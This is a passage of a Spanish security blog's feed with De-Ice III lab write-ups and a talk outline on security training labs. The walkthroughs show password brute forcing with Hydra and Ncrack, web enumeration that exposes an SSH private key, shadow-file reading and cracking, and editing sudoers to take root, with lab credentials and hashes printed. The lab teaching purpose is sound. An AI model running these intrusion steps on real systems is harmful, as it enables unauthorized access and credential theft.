</strong>E-Mail: pirrip@slax.example.net<strong><br />
Password: 0l1v3rTw1st</strong></p>
<p>Vemos que interesante información nos encontramos en el email 7 y 3 &#8230; Nuestro password y el de havisham!!</p>
<p>Intentemos nuevamente listar el contenido de passwd</p>
<p><strong>pirrip@slax:/tmp$ sudo cat /etc/shadow</strong></p>
<p>We trust you have received the usual lecture from the local System<br />
Administrator. It usually boils down to these three things:</p>
<p>#1) Respect the privacy of others.<br />
#2) Think before you type.<br />
#3) With great power comes great responsibility.</p>
<p>Password:</p>
<p>Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/cat /etc/shadow&#8217; as root on slax.</p>
<p style="text-align: justify;">Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos&#8230;</p>
<p><strong>pirrip@slax:/tmp$ sudo bash</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/bash&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo sh</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/bin/sh&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo ls</strong><br />
Sorry, user pirrip is not allowed to execute &#8216;/usr/bin/ls&#8217; as root on slax.<br />
<strong>pirrip@slax:/tmp$ sudo nano</strong><br />
sudo: nano: command not found<br />
<strong>pirrip@slax:/tmp$ sudo more</strong><br />
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 &#8230;<br />
<strong>pirrip@slax:/tmp$ sudo vi</strong></p>
<p style="text-align: justify;">Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! <strong>more</strong> y <strong>vi</strong> . Veamos que podemos hacer con estos.</p>
<p style="text-align: justify;"><strong>pirrip@slax:/tmp$ sudo more /etc/shadow</strong><br />
Password:<br />
<strong>root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::</strong><br />
bin:*:9797:0:::::<br />
daemon:*:9797:0:::::<br />
adm:*:9797:0:::::<br />
lp:*:9797:0:::::<br />
sync:*:9797:0:::::<br />
shutdown:*:9797:0:::::<br />
halt:*:9797:0:::::<br />
mail:*:9797:0:::::<br />
news:*:9797:0:::::<br />
uucp:*:9797:0:::::<br />
operator:*:9797:0:::::<br />
games:*:9797:0:::::<br />
ftp:*:9797:0:::::<br />
smmsp:*:9797:0:::::<br />
mysql:*:9797:0:::::<br />
rpc:*:9797:0:::::<br />
sshd:*:9797:0:::::<br />
gdm:*:9797:0:::::<br />
pop:*:9797:0:::::<br />
nobody:*:9797:0:::::<br />
<strong>pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::<br />
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::<br />
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::</strong></p>
<p style="text-align: justify;">Genial&#8230; Llevemos estos resultados a la herramienta de password cracking John The Ripper.</p>
<p style="text-align: left;"><strong>root@Sec-Track:/pentest/passwords/jtr# ./john &#8211;user=root &#8211;w=/root/passwords/verycool.lst 100.txt</strong><br />
Loaded 1 password hash (FreeBSD MD5 [32/32])<br />
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero</p>
<p style="text-align: left;">Lamentablemente no hemos dado con el password de root&#8230; Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.</p>
<p style="text-align: left;">Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ sudo vi /etc/sudoers</strong><br />
Password:<br />
reading /etc/sudoers</p>
<p style="text-align: left;">Allí modifico los permisos para nuestro usuario pirrip</p>
<p style="text-align: left;"><strong># User privilege specification<br />
root    ALL=(ALL) ALL<br />
pirrip  ALL=(ALL) ALL</strong></p>
<p style="text-align: left;">Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando&#8230; Incluyendo el siguiente!!</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ sudo passwd root</strong><br />
Changing password for root<br />
Enter the new password (minimum of 5, maximum of 127 characters)<br />
Please use a combination of upper and lower case letters and numbers.<br />
New password: ***********<br />
Re-enter new password: ***********<br />
Password changed.</p>
<p style="text-align: left;">Ahora solo basta:</p>
<p style="text-align: left;"><strong>pirrip@slax:/tmp$ su</strong><br />
Password: ***********<br />
<strong>root@slax:/tmp# </strong></p>
<p style="text-align: left;">Para el próximo post veremos algunos otros métodos para comprometer este sistema&#8230;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-acceso-al-sistema-y-elevacion-de-privilegios/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Conferencia: Laboratorios de Entrenamiento en Seguridad Informática &#8211; FLISOL 2010</title>
		<link>http://www.sec-track.com/conferencia-laboratorios-de-entrenamiento-en-seguridad-informatica-flisol-2010</link>
		<comments>http://www.sec-track.com/conferencia-laboratorios-de-entrenamiento-en-seguridad-informatica-flisol-2010#comments</comments>
		<pubDate>Tue, 04 May 2010 01:52:15 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Documentos]]></category>
		<category><![CDATA[Conferencias]]></category>
		<category><![CDATA[Criptografía]]></category>
		<category><![CDATA[Digital Forensics]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[Informática Forense]]></category>
		<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[Penetration Test]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=524</guid>
		<description><![CDATA[El pasado 24 de abril tuve el placer de asistir como conferencista al Festival Internacional de Instalación de Software Libre desarrollado en Medellín. La conferencia que presenté trató sobre la implementación de Laboratorios de Entrenamiento en Seguridad Informática, y de como el Proyecto Sec-Track puede ser una magnífica herramienta para cumplir con ese objetivo. El [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El pasado 24 de abril tuve el placer de asistir como conferencista al <a href="http://www.flisol.info/FLISOL2010/Colombia/Medellin" target="_blank"><strong>Festival Internacional de Instalación de Software Libre desarrollado en Medellín</strong></a>.</p>
<p style="text-align: justify;">La conferencia que presenté trató sobre la implementación de Laboratorios de Entrenamiento en Seguridad Informática, y de como el <a href="http://www.sec-track.com" target="_blank"><strong>Proyecto Sec-Track</strong></a> puede ser una magnífica herramienta para cumplir con ese objetivo.</p>
<p style="text-align: justify;">El contenido temático de dicha conferencia, es el siguiente:</p>
<ul>
<li>Descripción del Proyecto Sec-Track</li>
<li>Por qué implementar laboratorios de entrenamiento?
<ul>
<li>Facil inicio para aprendices</li>
<li>Diferentes niveles de complejidad</li>
<li>Portables</li>
<li>Simulación de entornos reales</li>
<li>Implicaciones legales</li>
<li>Problemas de conexión</li>
<li>Tiempo de desarrollo de escenarios</li>
<li>Costos</li>
<li>Tu lo construyes&#8230; Tu sabes como resolverlo</li>
<li>Posibilidad de crear comunidad</li>
</ul>
</li>
<li>Implementación de Hardware
<ul>
<li>Computadores (Dispositivos)</li>
<li>Herramientas de Red</li>
<li>Cables</li>
<li>Hubs</li>
<li>Switches</li>
<li>Routers</li>
<li>Dispositivos de almacenamiento</li>
<li>Firewalls</li>
<li>Acces Points</li>
<li>Reguladores eléctricos</li>
</ul>
</li>
<li>Implementación de Software
<ul>
<li>Virtualización</li>
<li><a href="http://www.virtualbox.org/" target="_blank">VirtualBox</a></li>
<li><a href="http://xen.org/" target="_blank">XEN</a></li>
<li><a href="http://www.qemu.org/" target="_blank">QEMU</a></li>
<li><a href="http://www.microsoft.com/windows/virtual-pc/" target="_blank">Virtual PC</a></li>
<li><a href="http://www.vmware.com/" target="_blank">VMWare</a></li>
<li>Diferentes S.O</li>
<li>Tools</li>
</ul>
</li>
<li>Laboratorios de Test de Penetración
<ul>
<li>Evaluación activa de las medidas de seguridad de la información</li>
<li>Metodologías</li>
<li><a href="http://www.sec-track.com/issaf-information-system-security-assessment-framework" target="_blank">ISSAF</a></li>
<li><a href="http://www.sec-track.com/metodologia-nist-sp-800-42" target="_blank">NIST SP 800-42</a></li>
<li><a href="http://labs.dragonjar.org/category/ceh" target="_blank">EC-Council (CEH)</a></li>
<li><a href="http://www.sec-track.com/objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos" target="_blank">De-Ice PenTest LiveCDs</a></li>
<li><a href="http://www.sec-track.com/objetivos-generales-para-los-entornos-de-ice-i-ii-iii-y-pwnos" target="_blank">PwnOS</a></li>
<li><a href="www.damnvulnerablelinux.org" target="_blank">DVL</a></li>
<li><a href="http://labs.dragonjar.org/category/owasp" target="_blank">WebGOAT</a></li>
<li><a href="www.dvwa.co.uk" target="_blank">Damn Vulnerable Web App</a></li>
<li><a href="http://www.sg6.es/labs/" target="_blank">Sauron 1.0</a></li>
<li><a href="www.foundstone.com" target="_blank">FoundStone</a></li>
<li><a href="www.BadStore.net" target="_blank">BadStore</a></li>
<li><a href="http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica" target="_blank">TurnKey Linux</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Laboratorios de Hardening
<ul>
<li><a href="https://projects.honeynet.org/honeywall" target="_blank">Honeywall CD-Rom</a></li>
<li><a href="http://labs.dragonjar.org" target="_blank">Labs Hardening Windows-GNU/Linux</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Laboratorios de Análisis Forense Digital
<ul>
<li><a href="www.seguridad.unam.mx/eventos/reto/" target="_blank">Retos Forenses UNAM</a></li>
<li><a href="www.DragonJAR.org" target="_blank">Reto Forense Comunidad DragonJAR</a></li>
<li><a href="www.honeynet.org/challenges" target="_blank">HoneyNet Project Challenges</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Laboratorios de Análisis de Malware
<ul>
<li><a href="www.Sec-Track.com" target="_blank">Windows-GNU/Linux</a></li>
<li>Libros Recomendados</li>
</ul>
</li>
<li>Muchos otros Entornos/Ideas/Posibilidades
<ul>
<li>CTF</li>
<li>Campus Party</li>
<li>Criptogramas</li>
<li>Crackmes</li>
<li>Hackme</li>
<li>WarGames</li>
</ul>
</li>
</ul>
<div id="__ss_3955409" style="width: 425px;"><strong style="display: block; margin: 12px 0 4px;"><a title="Laboratorios de Entrenamiento en Seguridad Informática - FLISOL 2010" href="http://www.slideshare.net/4v4t4r/laboratorios-de-entrenamiento-en-seguridad-informtica-flisol-2010">Laboratorios de Entrenamiento en Seguridad Informática &#8211; FLISOL 2010</a></strong></p>
<div style="padding: 5px 0 12px;">View more <a href="http://www.slideshare.net/">presentations</a> from <a href="http://www.slideshare.net/4v4t4r">4v4t4r</a>.</div>
</div>
<p style="text-align: center;"><object id="__sse3955409" classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="425" height="355" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="allowFullScreen" value="true" /><param name="allowScriptAccess" value="always" /><param name="src" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=labssec-track-100503191659-phpapp02&amp;stripped_title=laboratorios-de-entrenamiento-en-seguridad-informtica-flisol-2010" /><param name="name" value="__sse3955409" /><param name="allowfullscreen" value="true" /><embed id="__sse3955409" type="application/x-shockwave-flash" width="425" height="355" src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=labssec-track-100503191659-phpapp02&amp;stripped_title=laboratorios-de-entrenamiento-en-seguridad-informtica-flisol-2010" name="__sse3955409" allowscriptaccess="always" allowfullscreen="true"></embed></object></p>
<p>En el transcurso de algunos días estaré publicando en detalle cada uno de estos (y mucho más) entornos de entrenamiento, como objetivos de aprendizaje colaborativo en el Proyecto Sec-Track.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/conferencia-laboratorios-de-entrenamiento-en-seguridad-informatica-flisol-2010/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Desarrollo del entorno De-Ice III – Pruebas de Autenticación y Escaneo de Vulnerabilidades</title>
		<link>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades</link>
		<comments>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades#comments</comments>
		<pubDate>Wed, 07 Apr 2010 03:06:12 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[De-ICE]]></category>
		<category><![CDATA[Hydra]]></category>
		<category><![CDATA[JBroFuzz]]></category>
		<category><![CDATA[Ncrack]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Vulnerability Scanning]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=505</guid>
		<description><![CDATA[Continúa desde: Desarrollo del entorno De-Ice III – Enumeración de usuarios Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos: FTP Hydra: root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36 SSH Hydra: root@bt:~# [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">Continúa desde: <strong><a title="Permanent Link to Desarrollo del entorno De-Ice III – Enumeración de usuarios" rel="bookmark" href="../desarrollo-del-entorno-de-ice-iii-%e2%80%93-enumeracion-de-usuarios">Desarrollo del entorno De-Ice III – Enumeración de usuarios</a></strong></p>
<p style="text-align: justify;">Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos:</p>
<p style="text-align: justify;"><strong>FTP</strong></p>
<p style="text-align: justify;"><strong><a href="http://www.thc.org/thc-hydra/" target="_blank">Hydra</a>:</strong></p>
<p style="text-align: justify;">root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36</p>
<p style="text-align: justify;"><strong>SSH</strong></p>
<p style="text-align: justify;"><strong><a href="http://www.thc.org/thc-hydra/" target="_blank">Hydra</a>:<br />
</strong></p>
<p style="text-align: justify;">root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36</p>
<p style="text-align: justify;"><strong><a href="http://nmap.org/ncrack/" target="_blank">Ncrack</a>:</strong></p>
<p style="text-align: justify;">root@bt:/usr/local/share/ncrack# ncrack 192.168.1.100:22 -P /pentest/passwords/wordlists/pass.txt</p>
<p style="text-align: justify;">Después de mucho esperar mientras se llevaba a cabo los intentos de inicio de sesión con un usuario y password válido llegamos a la conclusión de que este no es un camino viable para acceder al sistema, pues las pruebas fueron realizadas con diccionarios en un comienzo básicos y compuestos por palabras comunes hasta diccionarios bastante robustos de millones de palabras, por lo tanto podemos afirmar que las contraseñas son complejas o los mecanismos de autenticación están medianamente asegurados.</p>
<p style="text-align: justify;">Hagamos uso de varios identificadores de vulnerabilidades, configuraciones por defecto o archivos y directorios sensibles. Para ello primero usemos <a href="http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project" target="_blank"><strong>OWASP Dirbuster</strong></a> para identificar directorios y archivos.</p>
<p style="text-align: justify;"><strong>Host 192.168.2.100</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.100/ -r</strong><br />
DirBuster: option requires an argument &#8212; r<br />
Starting OWASP DirBuster 0.12 in headless mode<br />
Starting dir/file list based brute forcing<br />
Dir found: / &#8211; 200<br />
Dir found: /cgi-bin/ &#8211; 403<br />
Dir found: /icons/ &#8211; 200<br />
File found: /level.html &#8211; 200<br />
File found: /copyright.txt &#8211; 200<br />
File found: /index2.html &#8211; 200</p>
<p style="text-align: justify;"><strong>Host 192.168.2.101</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.101/ -r</strong><br />
DirBuster: option requires an argument &#8212; r<br />
Starting OWASP DirBuster 0.12 in headless mode<br />
Starting dir/file list based brute forcing<br />
Dir found: / &#8211; 200<br />
Dir found: /cgi-bin/ &#8211; 403<br />
Dir found: /home/ &#8211; 403<br />
Dir found: /icons/ &#8211; 200<br />
File found: /200711_002.pdf &#8211; 200<br />
File found: /200611_001.pdf &#8211; 200<br />
File found: /200711_004.pdf &#8211; 200<br />
File found: /Acceptable_Use_Policy.pdf &#8211; 200<br />
File found: /Audit_Policy.pdf &#8211; 200<br />
File found: /Email_Policy.pdf &#8211; 200</p>
<p style="text-align: justify;"><strong>Ahora con Nikto en modo default<br />
</strong></p>
<p style="text-align: justify;"><strong>Host 192.168.2.100</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.100</strong><br />
- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.2.100<br />
+ Target Hostname:    slax.example.net<br />
+ Target Port:        80<br />
+ Start Time:         2010-03-13 17:14:41<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-0: DEBUG HTTP verb may show server debugging information<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.<br />
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ 3588 items checked: 8 item(s) reported on remote host<br />
+ End Time:           2010-03-13 17:15:08 (27 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;"><strong>Host 192.168.2.101</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.101</strong><br />
- Nikto v2.1.0<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Target IP:          192.168.2.101<br />
+ Target Hostname:    192.168.2.101<br />
+ Target Port:        80<br />
+ Start Time:         2010-03-13 17:16:25<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.<br />
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)<br />
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE<br />
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST<br />
+ OSVDB-637: <strong>/~root/</strong>: Allowed to browse root&#8217;s home directory.<br />
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons<br />
+ OSVDB-3233: /icons/README: Apache default file found.<br />
+ 3588 items checked: 7 item(s) reported on remote host<br />
+ End Time:           2010-03-13 17:16:54 (29 seconds)<br />
&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br />
+ 1 host(s) tested</p>
<p style="text-align: justify;">Además de las alertas sobre las versiones desactualizadas de software, podemos destacar la identificación del directorio de usuario root. (<strong>~root</strong>). Esto nos permite deducir que posiblemente existan diferentes directorios para los usuarios identificados. Veamos:</p>
<p style="text-align: justify;"><strong>Con netcat</strong></p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET <strong>/~root/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:36:11 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 557<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET<strong> /~pirrip/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:38:13 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 561<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET <strong>/~magwitch/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:40:13 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 565<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">&#8230;</p>
<p style="text-align: justify;"><strong>root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80</strong><br />
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out<br />
(UNKNOWN) [192.168.2.101] 80 (www) open<br />
GET<strong> /~havisham/</strong> HTTP/1.0</p>
<p style="text-align: justify;">HTTP/1.1 200 OK<br />
Date: Fri, 12 Mar 2010 17:42:27 GMT<br />
Server: Apache/2.0.55 (Unix) PHP/5.1.2<br />
Content-Length: 565<br />
Connection: close<br />
Content-Type: text/html</p>
<p style="text-align: justify;">Otra herramienta que nos permite identificar posibles usuarios, archivos, directorios en un host, es la herramienta de  <a href="http://www.s21sec.com/descargas/articuloFuzzing.pdf" target="_blank"><strong>Fuzzing</strong></a> <a href="http://www.owasp.org/index.php/Category:OWASP_JBroFuzz" target="_blank"><strong>JBroFuzz</strong></a></p>
<p style="text-align: justify;">Veamos:</p>
<p style="text-align: justify;">Tenemos los posibles usuarios válidos del sistema:</p>
<p>pickwick<br />
winkle<br />
snodgrass<br />
tupman<br />
weller<br />
tweller<br />
havisham<br />
magwitch<br />
pirrip<br />
nickleby<br />
rnickleby<br />
noggs<br />
squeers<br />
pinch<br />
tapley<br />
gamp<br />
marley<br />
scrooge<br />
cratchit<br />
sikes<br />
dawkins<br />
claypole<br />
root</p>
<p>Los cuales a su vez pueden tener un directorio como el identificado para root</p>
<p>Basta entonces con agregarle el símbolo virgulilla (~) al comienzo de cada uno y anexarlo a las listas de<a href="http://www.s21sec.com/descargas/articuloFuzzing.pdf" target="_blank"><strong> fuzzing</strong></a> de <strong> <a href="http://www.owasp.org/index.php/Category:OWASP_JBroFuzz" target="_blank">JBroFuzz</a></strong>.</p>
<p>0,http://192.168.2.101/~pickwick,404,Not Found,No,No<br />
1,http://192.168.2.101/~winkle,404,Not Found,No,No<br />
2,http://192.168.2.101/~snodgrass,404,Not Found,No,No<br />
3,http://192.168.2.101/~tupman,404,Not Found,No,No<br />
4,http://192.168.2.101/~weller,404,Not Found,No,No<br />
5,http://192.168.2.101/~tweller,404,Not Found,No,No<br />
<strong>6,http://192.168.2.101/~havisham,200,OK,No,No</strong><br />
<strong>7,http://192.168.2.101/~magwitch,200,OK,No,No</strong><br />
<strong>8,http://192.168.2.101/~pirrip,200,OK,No,No</strong><br />
9,http://192.168.2.101/~nickleby,404,Not Found,No,No<br />
10,http://192.168.2.101/~rnickleby,404,Not Found,No,No<br />
11,http://192.168.2.101/~noggs,404,Not Found,No,No<br />
12,http://192.168.2.101/~squeers,404,Not Found,No,No<br />
13,http://192.168.2.101/~pinch,404,Not Found,No,No<br />
14,http://192.168.2.101/~tapley,404,Not Found,No,No<br />
15,http://192.168.2.101/~gamp,404,Not Found,No,No<br />
16,http://192.168.2.101/~marley,404,Not Found,No,No<br />
17,http://192.168.2.101/~scrooge,404,Not Found,No,No<br />
18,http://192.168.2.101/~cratchit,404,Not Found,No,No<br />
19,http://192.168.2.101/~sikes,404,Not Found,No,No<br />
20,http://192.168.2.101/~dawkins,404,Not Found,No,No<br />
21,http://192.168.2.101/~claypole,404,Not Found,No,No<br />
<strong>22,http://192.168.2.101/~root<strong>,200,OK,No,No</strong></strong></p>
<p>Las líneas que están en negrita corresponden a ubicaciones reales y activas en el servidor objetivo</p>
<p>~havisham<br />
~magwitch<br />
~pirrip<br />
~root</p>
<p>Hagamos ahora una exploración de directorios y archivos mediante JBroFuzz a los directorios raíz del server y de los usuarios identificados.</p>
<p><strong>Al host 192.168.2.100</strong></p>
<p>4,http://192.168.2.100//icons/,200,OK,No,No<br />
784,http://192.168.2.100//index.php/123,200,OK,No,No<br />
<strong>802,http://192.168.2.100//info.php,200,OK,No,No</strong> (Y)</p>
<p><strong>Al host 192.1682.101</strong></p>
<p>4,http://192.168.2.101//icons/,200,OK,No,No</p>
<p>Ahora a los directorios identificados para los usuarios:</p>
<p><strong>Usuario havisham:</strong></p>
<p>Ningún resultado de interés</p>
<p><strong>Usuario magwitch:</strong></p>
<p>Ningún resultado de interés</p>
<p><strong>Usuario pirrip:</strong></p>
<p>385,http://192.168.2.101/~pirrip//.ssh,200,OK,No,No</p>
<p><strong>Usuario root:</strong></p>
<p>Ningún resultado de interés</p>
<p>Vemos entonces como pudimos identificar la existencia del directorio .ssh para el usuario pirrip</p>
<p>http://192.168.2.101/~pirrip//.ssh/</p>
<h1>Index of /~pirrip//.ssh</h1>
<pre><img src="http://192.168.2.101/icons/blank.gif" alt="Icon " /> Name                    Last modified      Size  Description
<hr /><img src="http://192.168.2.101/icons/back.gif" alt="[DIR]" /> Parent Directory                             -
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa                  05-Jan-2008 20:29  1.6K
<img src="http://192.168.2.101/icons/unknown.gif" alt="[   ]" /> id_rsa.pub              05-Jan-2008 20:29  393
<hr /></pre>
<address>Apache/2.0.55 (Unix) PHP/5.1.2 Server at 192.168.2.101 Port 80</address>
<p>En el próximo post veremos como podemos utilizar la información obtenida para penetrar el sistema.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.sec-track.com/desarrollo-del-entorno-de-ice-iii-%e2%80%93-pruebas-de-autenticacion-y-escaneo-de-vulnerabilidades/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Turnkey Linux, Proyecto de Appliances para la Implementación de Laboratorios de Seguridad Informática</title>
		<link>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica</link>
		<comments>http://www.sec-track.com/turnkey-linux-proyecto-de-appliances-para-la-implementacion-de-laboratorios-de-seguridad-informatica#comments</comments>
		<pubDate>Mon, 29 Mar 2010 23:23:24 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Aseguramiento]]></category>
		<category><![CDATA[Gobierno IT]]></category>
		<category><![CDATA[Test de Penetración]]></category>
		<category><![CDATA[Tools]]></category>
		<category><![CDATA[Appliances]]></category>
		<category><![CDATA[Hardening]]></category>
		<category><![CDATA[LiveCD]]></category>
		<category><![CDATA[Penetration Test]]></category>
		<category><![CDATA[Virtualización]]></category>

		<guid isPermaLink="false">http://www.sec-track.com/?p=509</guid>
		<description><![CDATA[Turnkey Linux es un proyecto Open Source de desarrollo de appliances libres para la implementación de plataformas tecnológicas . Estas appliances también pueden ser utilizadas para la implementación y puesta en marcha de  Laboratorios de entrenamiento en Seguridad Informática. Turnkey Linux pone a disposición de sus usuarios diferentes entornos en formato LiveCD sobre distintas herramientas [...]]]></description>
